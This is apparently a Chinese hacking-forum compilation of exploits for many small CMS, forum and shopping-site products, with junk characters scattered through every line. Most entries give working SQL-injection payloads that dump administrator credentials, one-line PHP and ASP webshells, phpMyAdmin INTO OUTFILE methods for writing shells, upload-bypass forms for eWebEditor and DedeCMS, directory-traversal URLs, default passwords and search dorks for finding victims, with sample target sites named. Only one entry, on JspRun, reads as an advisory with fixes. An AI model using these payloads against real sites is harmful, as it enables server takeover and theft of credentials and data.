启航企业建站系统 cookie注入漏洞通杀所有版本
3 {; T$ h: L& e
7 T) M/ t3 R! _6 y5 V直接上exploit:7 ^* d. Z o6 p5 f
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
4 D3 E8 m4 H( Ftest:http://www.tb11.net/system/xitong/shownews.asp?id=210
4 J4 J6 c, e! s* E' s& C--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# M6 s W# t" @+ FAsprain论坛 注册用户 上传图片就可拿到webshell
$ i4 U3 F# J |7 i% G( r
5 J9 v) _/ a' R0 GAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
9 [& ]2 q' F& U2 e5 |4 [1.txt存放你的一句话马 如:<%execute(request("cmd"))%>- V: _( }; m2 D& ?2 U' J& d
2.gif 为一小图片文件,一定要小,比如qq表情图片9 I2 ^2 K" D3 v
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
) H9 }8 y) l+ f* Q0 V: S) |0 j4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
, m2 _ U% j3 U. [5 s# |$ K5.q.asp;.gif: o# @5 b& e3 ^
google:Powered by Asprain
; E o# ?! Z ]--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 ~) N( H4 l; b! z7 l
6 T% q) J/ n0 R6 I7 b1 lShopNum1全部系统存在上传漏洞。4 g2 c6 _* @3 R
) W2 w) ~4 Q ?! \首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。6 k) z0 _9 {- h" V
按说明 提示登录后台。。) G( d$ U+ X, X( q
在后台功能页面->附件管理->附件列表9 t* _% ?8 T. j3 ?* e
可以直接上传.aspx 后缀木马
0 H* X3 e. b- Q2 Q; {+ _- i% C( dhttp://demo.shopnum1.com/upload/20110720083822500.aspx
' g' X1 f0 b) e$ V9 F! ?; b--------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 q, x% E: x) v- O% ?; h$ w
7 F0 K5 M2 x6 t0 f牛牛CMS中小企业网站管理系统 上传漏洞, i+ Z: x4 z) E/ A5 n
* \" Q" E( A! f$ P( W( t* j9 C" J( [
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。7 Q' Z) n7 H( K3 \" H
后台:admin/login.asp7 s2 q" G3 B. Z
ewebeditor 5.5 Nday- n& ]# y6 }$ i/ H
exp:: u3 j4 q# e' q( K. ~5 z8 i
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
& L) i% H" r& j8 D$ B( m; h<input?type=file?name=uploadfile?size=100><br><br>?
, D- X; j4 Q7 j X/ U* p* K1 j<input?type=submit?value=upload>?2 h0 d4 d' J7 S5 y$ r7 k4 \: g; A/ G
</form>
$ W% d# u! s9 T7 x1 zps:先上传小马., w8 D' @8 [' a% T
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏7 g `! `" k, ?( b
! [2 V% q% e% b7 L) g) A5 u--------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 h. r0 R0 W+ H- ]$ b! I: ^) j+ `8 P
4 W7 q/ s5 {4 L. b$ R7 A% mYothCMS 遍历目录漏洞4 U% W7 M4 F$ u+ m* \" {9 Q
. |* V( F0 q7 Y# a- U. j$ C优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。6 }9 X! O$ q( O
默认后台:admin/login.asp: m4 K' d4 G2 K2 [+ |
遍历目录:
3 p: _% w% H V" H2 F0 Zewebeditor/manage/upload.asp?id=1&dir=../
4 d4 _/ g9 [+ V! Sdata:
$ Q- f# [2 f+ @" V, D5 ohttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa6 z1 g: c3 Q% H5 ~
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------: V4 q" C3 d0 K' Z$ K E5 ~! M" x
8 |2 M1 p5 ?* {% ANet112企业建站系统 1.06 \; y4 N6 C& U2 G
& m+ @6 e1 Z* l b5 U7 i7 V源码简介:
7 h( l) }4 U$ J WNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
+ a+ G7 W1 j6 o) i) b- F- w$ R7 m添加管理员:0 N) m& F6 ~" p! T: c! }% R# ^
http://www.0855.tv/admin/admin.asp?action=add&level=2
3 O( m7 S2 a1 m; w" ?9 N) N: A3 E' l其实加不加都不是很重要,后台文件都没怎么作验证。' g8 k. S2 w: ^4 M2 W! \" L, a
上传路径:) I# @ a' [2 B/ p5 b5 h) S- I
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=2009 r4 ]: @: Y! ^* U6 \# L, F9 F
http://www.0855.tv/inc/Upfile.asp?Stype=25 `1 i; ~* C. K" @! }! K
怎么利用自己研究。
6 X2 E0 z! f; C遍历目录:, R6 \+ D3 n8 N7 c, o* O/ c
http://www.0855.tv/admin/upfile.asp?path=../..# m3 ~ ^& ^. G" G' b4 U: x
如:! t- @ x) N- h, O2 j
http://www.0855.tv/admin/upfile.asp?path=../admin
+ A7 X# L# }' x% Y/ y& Dhttp://www.0855.tv/admin/upfile.asp?path=../data
) f: U: a$ f4 Z" K--------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 F9 P) \4 x9 C: a: \0 y4 y3 f
) |$ ?. x4 X7 q7 n易和阳光购物商城通杀 上传漏洞
0 L4 i; S% t( P
" W k! y+ B- t! V+ k9 n前提要求是IIS6.0+asp坏境。
% ?" }3 X$ v8 G& H: n( E1 ^漏洞文件Iheeo_upfile.asp 9 S/ d8 A# d% C4 I! i6 O
过滤不严.直接可以iis6.0上传1 N- W* ^& J: s2 E( k; I7 }* b
把ASP木马改成0855.asp;1.gif
- ^4 Q, S& p1 P" F: n! I* c' T直接放到明小子上传 e6 S0 f3 m j. B! u" q
Google搜索:inurl:product.asp?Iheeoid=
}1 F+ i1 j9 A8 n! u6 T1 T5 Z# ?% k--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# X6 x4 v5 ^6 W& e9 P/ u+ Z- a+ O# |7 {
phpmyadmin后台4种拿shell方法$ ~# k6 ]0 B. {) }# V* `
6 O0 f6 i6 }( f$ K9 T3 q方法一:# p; f& G' O! v) Z# ~7 U
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );1 W: z6 Q" O8 {1 D4 U
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');# Z- y( F2 e* `. J! a& ~* v
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
. O& d) ?. E7 E5 z. n----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
6 D$ m8 f- v" ?一句话连接密码:xiaoma% C1 G8 T9 D, w4 M1 U, y
方法二:! O8 Q, ^& \) F! [) z
Create TABLE xiaoma (xiaoma1 text NOT NULL);- h G. w2 @; }8 I6 o$ W) w
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');3 ~8 G+ p% e& b
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';/ F* ?1 S6 f6 P& f, s9 L0 W2 Z
Drop TABLE IF EXISTS xiaoma;
5 x4 `$ q$ N% { t- `- V方法三:' m& |" g& X+ X8 ?
读取文件内容: select load_file('E:/xamp/www/s.php');( V+ p1 f( o) ^+ B( y
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
8 n" F8 {' Q; \$ G! O# x7 ^" fcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php') c3 k3 X1 x* X$ C: e8 W) @
方法四:
6 b7 u& j7 y; }2 b. m1 C( yselect load_file('E:/xamp/www/xiaoma.php');8 M( W5 I1 E9 p
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
w3 z o0 @2 Z8 q+ {然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
1 f) D( {" y! z. W. m--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ f$ ]$ H7 @* f) g$ }! m2 H
' S% j2 }; l$ n$ M7 S; c+ g' {传信网络独立开发网站源码0day漏洞
/ Y" j* F; H* _* u6 c+ h3 Q. e
' ~+ r, V8 N0 P2 e% \6 J后台system/login.asp
0 Z: t7 ~, X% n' d, I- B; d进了后台有个ewebeditor
L8 g. Z u! t! G' CGoogle 搜索inurl:product1.asp?tyc=; b9 X7 o) U7 [+ [* ]
编辑器漏洞默认后台ubbcode/admin_login.asp
* Y. ]$ d4 c8 }- X4 T数据库ubbcode/db/ewebeditor.mdb1 c8 _1 ^. L; r( C) K& {
默认账号密码yzm 111111
# h) u. O* ^) }/ Q, D, l) X7 r* O4 y v' n; }8 W( k
拿webshell方法
; T/ H. V' p$ c! h登陆后台点击“样式管理”-选择新增样式 - y$ W; f2 u$ `/ Y5 Q
样式名称:scriptkiddies 随便写
* n# d' i& j! z# q; W9 A路径模式:选择绝对路径
. P" H: J' L3 L, h# t& k. D* `图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
Q, U$ \" m& m9 a图片类型比如就是我们要上传的ASP木马格式
( A# ^5 p1 Q: ^! ^8 v! \% k$ ~上传路径:/+ g4 m5 c$ \: H
图片限制:写上1000 免的上不了我们的asp木马+ w, q3 c z) L7 c; D9 C3 a
上传内容不要写2 ~0 ^8 j7 f9 s& h6 B0 Q5 `! w
可以提交了
/ n% A* A" e! v' V( @% w! }; c样式增加成功! 2 B! a& S' f' ?
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
; V4 J- u$ c% o+ W2 Z按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
9 E9 f: i1 C5 X网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies0 i. M, \( W6 S& d* A3 b: h
上ASP木马 回车 等到路径2 y- E" j. p0 A) J$ e8 ]9 ~& H
, e1 _: w1 t+ a% |0 ^% q
后台:system/login.asp
4 K; I }: p) l+ Y" H! lExp:" w# u5 j, j' z
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master5 k9 I3 G# E% H2 K1 r$ s, Z% ?3 v
测试:
* r9 a8 N3 E( R+ r+ P* P8 Z5 D8 Vhttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master; G }; u/ R$ G+ D6 n7 I4 L: m. r
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
8 p- T9 t% s; o--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 T; ^4 N9 z6 q4 I' `9 N% V% A8 d8 Z) x, |* _6 N9 U ~
foosun 0day 最新注入漏洞
* _! ~$ F+ a% f5 k
" x9 R, T+ t8 g2 n) \漏洞文件:www.xxx.com/user/SetNextOptions.asp
6 W! W7 `: Q' A) f) f利用简单的方法:
% W% ~1 q7 g2 O+ _+ ~' @7 _暴管理员帐号:4 o6 J: p! X5 t: W* q
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin& F( S* c0 z/ r* ?# o e
暴管理员密码:* |- i& z. Q9 t. x2 c3 R3 b) X
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
- g; m; N9 i& w% i# c' K- Z, |* S--------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 q* ~: w: H' B
& o) z/ z4 a8 K3 y网站程序的版权未知!
( N; z- K! P' m2 f
9 {+ X9 Z% c, P6 n s; [/ g0 G默认网站数据库:( V2 ~$ f p0 h: V& t" W6 k! N
www.i0day.com/data/nxnews.mdb
; Z& S# a* A1 p6 Q% qewebeditor 在线编辑器:
7 W6 N0 O( c; y6 t6 l编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb0 m& W4 M4 A% T0 F) \( ~
登录地址:ewebeditor/admin_login.asp4 Q1 h9 a' N' J/ e9 G
默认密码:admin admin
" Q: D, L& v! I1 W$ T2 K+ u登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
+ |0 p$ y4 h1 k- C
X1 z+ P4 K% Z8 P: d7 C8 {& ySql注入漏洞:6 o* }# ? ?/ B# } G; |. G
http://www.i0day.com/detail.asp?id=12
/ A& U% n, E9 Z, f5 Y% `5 C! sexp:
8 }1 M7 V6 M1 {& W+ O E Vunion select 1,admin,password,4,5,6,7,8 from admin8 r- C' @6 \, p# g9 H4 g
爆出明文帐号/密码
9 M) i( v: _1 @
9 h- K) L2 c' Y& z上传漏洞:1 L9 S" B: [1 ^4 O2 Z0 q
后台+upfile.asp
- V4 ?( E) s/ t# I. k2 w) k如:
/ D# O- v, @0 k* j. @http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
) G% ^! k6 s% hshell的地址:网址+后台+成功上传的马
( ^9 S7 D. o# _- q+ M/ zgoogle:inurl:news.asp?lanmuName=. n/ Y7 l4 e& [* {' y4 U( K' i, d
------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ K- a* l) d7 c% a3 S
+ v# n) T! g- j9 W/ O& Idedecms最新0day利用不进后台直接拿WEBSHELL9 D. j; D/ L# E# a0 k8 j
. p- C( A; H$ d9 I5 T( e# x" U
拿webshell的方法如下:
) A2 Z [: s" i8 @- ]+ |+ S% ]1 j网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.3 R, U8 i# P8 ~0 }/ L N% L
前题条件,必须准备好自己的dede数据库,然后插入数据:" T! t$ k) V4 T" d6 J% Z& b
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
- G9 X0 S9 `. U; t* X) B3 `( Y) s) R' H. o
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。6 U& [4 [! J- v; C- j" T0 ^! N
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
* Y0 Y, P8 _% ?. W. B9 j<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
) l. ?' i5 |& S2 q1 r7 M+ D, E- a<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
+ _/ X2 j( P) P% Z) m<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
7 t8 G; O. d# [$ }. @<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
1 m! V: ]6 t- g' S! u {* V& h<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
9 \" Y! w8 [# a7 D3 j% W; @<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
' a v: ~+ B1 N* s+ |1 g+ I<input type="text" value="true" name="nocache" style="width:400">6 P! | X" z9 D. B1 U
<input type="submit" value="提交" name="QuickSearchBtn"><br />
7 i# V* k8 Q8 @* v5 c- U4 U* t</form>
/ ^* o' F5 V- k<script>& A; S+ H8 q7 b @ N& a9 i ~* G0 e
function addaction()
3 z' ]6 }( F: d" V( G{
; H0 \3 [6 v& x+ g6 ~" Odocument.QuickSearch.action=document.QuickSearch.doaction.value;4 [3 t" n6 r; w6 A' ]
}. R- x" c. s& U1 s/ I2 _; @$ S. ]
</script># G5 b8 @" K* W" @5 w; A4 ?
-----------------------------------------------------------------------------------------------------------------------------------------------, t1 k+ r7 d" r# G1 X% p
6 g# l- Z0 p0 f- L( [7 q2 [
dedecms织梦暴最新严重0day漏洞
8 J, _' N% T) _3 t* v, `' bbug被利用步骤如下:; q/ ~5 E8 V( |
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
. _" K, P. P2 ?+ P" r! e把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
" z; O+ i, [ z- V" l! f9 b8 i# E------------------------------------------------------------------------------------------------------------------------------------------- k0 z: W3 T/ q8 c
/ }2 Y" p; k( M( @; `; [9 @) p1 ]多多淘宝客程序上传漏洞 ) E4 W/ P4 p/ x) z) ], t" q
漏洞页面:
4 f5 T; y9 N8 J( I1 j2 P& j Vadmin\upload_pic.php
5 U1 W0 m) ~% r4 s# h传送门:
/ o$ L) R1 d9 M; ahttp://www.www.com/admin/upload_pic.php?uploadtext=slide16 ~; V# C. \% b. h A
PS:copy张图片马 直接 xxx.php 上传抓包地址!
+ h* L( V8 P: {------------------------------------------------------------------------------------------------------------------------------------------------------7 G, y3 ~5 @3 m: t6 e
9 ^6 m0 X B4 g- w P/ u5 Y0 \
无忧公司系统ASP专业版后台上传漏洞
W+ q, V& q9 Y' L5 d: q漏洞文件 后台上传9 r2 _8 C! ?' r u7 S
admin/uploadPic.asp
6 U7 P F) _0 U& t. G6 H' B漏洞利用 这个漏洞好像是雷池的
6 R4 V& P: y: V' u b. shttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1% T' T( [8 ~8 y0 \; [
等到的webshell路径:+ C% S4 x$ }5 P
/UploadFiles/scriptkiddies.asp;_2.gif* s! N: \" o% @) ?- p# `8 l' |
---------------------------------------------------------------------------------------------------------------------------------------------------" f6 {" D: n! ~9 C- x+ B# @# P4 X
" x! r5 W$ V( {$ _& u
住哪酒店分销联盟系统2010
# `1 N, z* O' [0 s2 E* JSearch:
& n8 e1 d, ^# _+ [inurl:index.php?m=hotelinfo& i6 A3 x. _) L
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
0 R7 P" h: S m( f默认后台:index.php?m=admin/login2 T; h$ Y- t" O. M* d
--------------------------------------------------------------------------------------------------------------------------------------------------* f w) g$ g6 r2 F! ^2 T
4 s" U* P5 H5 |% e4 i `# L
inurl:info_Print.asp?ArticleID=
1 E9 j U+ ]" s后台 ad_login.asp; w8 x5 R% f" h! d+ l
爆管理员密码:$ v! W& v7 Y& i; W( k- |
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
& M* x/ D9 S( t+ M+ y% j# [# l------------------------------------------------------------------------------------------------------------------------------------------------------------* ~ e C( T/ d8 G/ k1 f
. f6 q: b2 ?1 ?0 v0 U搜索框漏洞! P1 t7 S0 n* l# G$ Q$ G
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
6 H0 s" P. d0 L--------------------------------------------------------------------------------------------------------------------------------------------------------' o9 S5 E6 r0 W- @
0 P% y0 Q5 @( T$ @# T6 V, S8 y
关键字:
; S! T+ c5 @2 N" q' ginurl:/reg_TemletSel.asp?step=23 |- y0 W% ^' s4 i# s2 y
或者' J7 \' f" A# x; p; G B" G, _# ?
电子商务自助建站--您理想的助手) B) p! Q* U% N. j& l% Y
-------------------------------------------------------------------------------------------------------------------------------------------------% o7 {* W0 Y) E# V
9 h$ _" d6 C" P: H% C
iGiveTest 2.1.0注入漏洞, j; Q# q9 M5 y5 _+ T8 v/ [! o; Y
Version: <= 2.1.0
! h3 I2 w, q/ O, U% C& p& W# Homepage: http://iGiveTest.com/+ Z' Y; }) `* k
谷歌关键字: “Powered by iGiveTest”$ |/ B1 U2 W- a" {% u
随便注册一个帐号。然后暴管理员帐号和密码
* e p0 a/ p7 ^6 X3 bhttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
7 J6 C. K! U% j/ S7 O3 B------------------------------------------------------------------------------------------------------------------------------------------------" N* k0 J0 f) }: ?/ k- @8 S5 `
( C9 @9 ^. b0 |+ S/ {) Z7 O
CKXP网上书店注入漏洞
4 k) c7 `2 s% F! ~工具加表:shop_admin 加字段:admin6 Q$ c" o, Z! F7 d" S4 G0 c
后台:admin/login.asp
/ h" @ m+ _6 F L i登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
( ^7 P- j u& K9 z% Einurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
! v: o( s3 a8 \- t% P1 t6 a--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& F, B x- r. ]5 I- g
+ ^& n, N f& P' J$ H3 y8 E段富超个人网站系统留言本写马漏洞
* T0 D! D: x* R2 {源码下载:http://www.mycodes.net/24/2149.htm* [$ b* B: N* t0 c& x7 O4 l3 q L
addgbook.asp 提交一句话。
: m& K' D0 v+ \/ y* t4 T连接: http://www.xxxx.tv/date/date3f.asp! W0 n# a3 n) O( C* k6 Q g4 e
google:为防批量,特略!! Q6 H, X6 @2 ~7 P0 E7 z* f
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 y: R. D: |* J& @4 S) }
]0 {7 Q$ @8 k( d$ c% c# p1 _智有道专业旅游系统v1.0 注入及列目录漏洞- p+ q$ Y/ H9 m* w4 a, [6 j
默认后台路径:/admin/login.asp
; J! d! ^! N/ ^1 \7 M0 H默认管理员:admin
2 M8 c) @" n5 F& Q$ W- e" J默认密码:123456
0 n ~2 }3 k) l+ z4 R5 RSQL EXP Tset:
% u$ l. [+ g% ?7 Q) W5 \/ q Jhttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin. _: `2 J+ N3 @7 X$ t9 q
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" f, ?+ f( b5 D7 V
* W% A3 x6 h; |# u1 Rewebeditor(PHP) Ver 3.8 本任意文件上传0day
+ ]9 y" X6 T! f, x; l* MEXP:1 h+ X- o6 x. a0 m$ D6 U
<title>eWebeditoR3.8 for php任意文件上EXP</title>8 h, W, n9 I, |8 }/ l
<form action="" method=post enctype="multip7 M# [6 ?# r/ o
art/form-data">
8 k0 Q, [ Y7 F. v. ~! ?' a<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 4 d/ v6 n% _3 B% @
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> * J7 k$ _6 m, I% g
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> . \- [) n( s0 j
file:<input type=file name="uploadfile"><br> 7 i% A0 u2 b3 B
<input type=button value=submit onclick=fsubmit()>
5 F: F, K; {% a1 m8 D0 r</form><br> ( n) D" [3 Q: c' S( v! o8 l
<script>
' w! q0 n. r9 d" g, y; h7 B7 Q1 ufunction fsubmit(){
V2 K3 K- d# ^8 ]* x3 H- \# |form = document.forms[0];
: i0 q$ P. a: L! M9 b' M5 Dform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; ; S* s6 i- z, p
alert(form.action);
/ H; Q" ?7 `1 J) R) M1 `& oform.submit(); 2 z& n$ I2 e5 V8 {+ I
}
# y1 n6 V7 ~2 |* _</script> d/ C0 `: Q' ~/ V
注意修改里面ewebeditor的名称还有路径。
5 }, W0 B) M6 g4 i( v, q3 E; e---------------------------------------------------------------------------------------------------------------------------------------------------------------------------* \4 C% ~4 M5 K
+ c$ [3 i) b3 l3 K提交’时提示ip被记录 防注入系统的利用
6 u. l" }% n& j1 q" X网址:http://www.xxx.com/newslist.asp?id=122′
" D& t$ t2 r, L# V2 L& c4 `' D提示“你的操作已被记录!”等信息。9 Z+ `2 `+ B0 V n
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。0 b9 x$ G) [) \0 C
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ n5 M' q6 U7 E, b
8 I) p8 h; Z) g+ M/ w! Y: D2 t2 P: {西部商务网站管理系统 批量拿shell-0day
/ d8 S- o4 ^5 P! V' `7 w这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb 9 k& J; r; z" [- W
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛) B6 T# w/ K6 M
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合) D7 D% U4 Q$ @2 C6 t
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
! Y: \6 ?" O) l---------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 P+ ^' v* E i8 p: }: \2 [
6 N5 |. Y. t4 hJspRun!6.0 论坛管理后台注入漏洞" x# z+ ^5 w- b2 e! Z
/ {0 b# e H( O5 k* f8 pSEBUG-ID:20787 发布时间:2011-04-30 影响版本:
. d' C$ Z! F+ {JspRun!6.0
) F$ M6 Y. z& V8 ?9 `# T2 g! n5 r漏洞描述:- Z K: g8 {6 U$ {3 r Z
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。2 V: M2 S- m4 x
在处理后台提交的文件中ForumManageAction.java第1940行
( i! ?1 G( N# [) a5 V9 Q% b# s! hString export = request.getParameter("export");//直接获取,没有安全过滤; i$ E; M5 X5 |+ x8 } L
if(export!=null){$ Q5 L; m4 `# m
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...: a$ T/ @4 A4 ~0 T
if(styles==null||styles.size()==0){. O7 K% w) g+ ` r- S, I* U
<*参考
. m* A$ ~, @, \" e( gnuanfan@gmail.com
8 f3 Y4 Z0 M1 P. V& J1 l$ S* ^*> SEBUG安全建议:4 n" @% h; \1 n2 d0 `
www.jsprun.net" Y7 `) @) ^1 d; O; j- T; r1 Q
(1)安全过滤变量export4 n, D4 }, x% X! t( l* ?+ h
(2)在查询语句中使用占位符" Y0 @6 Z R" H9 k* [
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 W9 t( ~3 }5 h; b; b
" k( P: l1 k0 L/ m乌邦图企业网站系统 cookies 注入- @7 @% z2 h7 H; Z
1 ^3 C* e3 D* c; [. n
程序完整登陆后台:/admin/login.asp6 Y6 t) E0 K' A' K/ T+ c
默认登陆帐号:admin 密码:admin888
3 u) v5 x1 C) j语句:(前面加个空格)6 x. O% i4 F/ b4 ^
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin+ w5 p: ^% T8 {, `6 g! e
或者是16个字段:! s$ b# t* `4 L
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin g# m1 I* `: D, I
爆不出来自己猜字段。$ J( t( l. g+ p& V5 S
注入点:http://www.untnt.com/shownews.asp?=88
7 J& y: ?6 S. O! X% K7 ugetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
# i1 s! ]) R5 T* r# j关键字:( f) U; Z; R' ^" @$ b3 q( P
inurl:shownews?asp.id=
& G, f; _% k2 r, ~3 e6 [-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 T) W v) G% [+ @, N
n( Z) b+ d; w6 k( L' Q* j: SCKXP网上书店注入漏洞
+ x: O' }$ l) z& T& h
. ^3 N2 F/ a/ j7 x工具加表:shop_admin 加字段:admin
5 q) O! V. q: O7 C; U后台:admin/login.asp ! @- d. F8 \* e. }
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/! F1 {; w# Z% h" l3 D
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
2 ?! F9 s/ c+ O& N---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" ?( n: f- w) a4 {6 p, z1 J: {& @; d# x: |5 Q9 {& A
YxShop易想购物商城4.7.1版本任意文件上传漏洞0 S! e4 a, V/ J! s: l
. [1 h, [+ ]6 Ghttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
- t8 z: G- s4 W跳转到网站根目录上传任意文件。- y7 r7 u$ o Q2 e2 h j4 z# A
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
